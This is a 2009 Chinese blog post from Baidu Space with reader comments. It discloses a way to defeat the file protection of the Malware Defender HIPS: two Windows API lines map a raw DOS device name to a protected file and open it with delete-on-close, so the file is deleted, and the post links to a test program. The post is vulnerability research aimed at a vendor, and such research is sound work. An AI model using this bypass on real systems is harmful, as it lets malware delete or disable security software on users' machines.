百度空间 | 百度首页 
 
查看文章
 
二行代码再破MD文件保护
2009-10-30 19:44

下午Malware Defender更新了2.4.3,根据我的帖子内容更新了驱动,封了FILE_DELETE_ON_CLOSE的常规方式。晚上睡醒了看了一眼更新的程序,新驱动FD保护仍是很弱。随便变换了一下,重新让FILE_DELETE_ON_CLOSE攻击方式起效了

这是第三次发出突破MD文件保护的代码,目前所有的攻击都是针对MD对NtCreateFile钩子的处理,而MD剩下的钩子还有3,40处左右~光是NtCreateFile,目前至少还有5种左右的攻击方式 :)

此方式测试对2.4.3版本有效,同上个测试程序一样,可选择任意MD保护文件删除

示例代码如下:

DefineDosDeviceW(DDD_RAW_TARGET_PATH , L"killmdx" , L“\\??\\c:\\program files\\malware defender\\mdlog.txt");

CreateFile("\\\\.\\killmdx" ,   DELETE ,    0,   0,   OPEN_EXISTING ,   FILE_FLAG_DELETE_ON_CLOSE,0);

测试程序:http://mj0011.ys168.com 漏洞演示目录下 mdvuln_2.rar


类别:默认分类 | 添加到搜藏 | 浏览() | 评论 (23)
 
最近读者:
 
网友评论:
1
2009-10-30 19:46 | 回复
沙发
 
2
2009-10-30 19:52 | 回复
shafa没了。。。
 
3
2009-10-30 19:54 | 回复
囧~
 
4
2009-10-30 20:00 | 回复
掐上了? 呵呵
 
5
2009-10-30 20:02 | 回复
玩玩而已 不必当真
 
7
2009-10-30 20:19 | 回复
希望高手们多交流一下,给大家奉献更好的软件
 
8
2009-10-30 21:19 | 回复
假如剩下的钩子漏洞还有35处 而mj又愿意发35篇博文
那md的版本号就可以突破2.7.8 = =
不管怎样有抓漏洞的还是谢谢了
 
9
2009-10-30 21:59 | 回复
邪恶的文件路径映射。。
 
10
2009-10-30 22:22 | 回复
高手垂青,深表荣幸,thx

http://www.torchsoft.com/chs/
 
11
2009-10-30 22:43 | 回复
MD遇上MJ算是倒霉了……
 
12
2009-10-30 22:56 | 回复
没 有个人出来帮找bug 这是好事情
 
13
2009-10-30 23:57 | 回复
打酱油、、、、、、、、
 
14
2009-10-31 02:24 | 回复
10楼是S大。
 
15
2009-10-31 04:25 | 回复
软件作者是假敬业,真为小钱忙碌,觉得这款软件会热闹一阵子就沉寂下去,因为他真正关注的东西很有限的,不是很技术的思维模式,没必要为他太多的启发,一个局限的思路,不会有真正的圆满的软件思想表现的,让那些捧正版人场的卡饭们继续它们的吼吧
 
16
2009-10-31 07:54 | 回复
人就这样,赶着他,就走,不管了,他就懈了
 
17
2009-10-31 09:13 | 回复
这软件做了一年多,更新速度一直很快,之后就不知道了。
 
18
2009-10-31 09:14 | 回复
但起码在EQ和RTDP和S3的暂停开发以后,唯一继续开发的国产HIPS。
 
19
2009-10-31 09:14 | 回复
可能mj觉得HIPS不好 ,但至少我不想让一群中学弄的免杀,所以没看到更好的了。
 
23
2009-11-01 09:24 | 回复
Uses the lpTargetPath string as is. Otherwise, it is converted from an MS-DOS path to a path.
这函数都没用过 更别提知道了
 
25
2009-11-03 16:58 | 回复
MD真可怜啊,被如此虐。。。
 
28
2009-11-03 19:43 | 回复
google上意外发现了个vmxark~
 
29
2009-11-04 19:46 | 回复
MD因为MJ而火.......
 
30
2009-11-05 12:55 | 回复
强大啊~~~
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu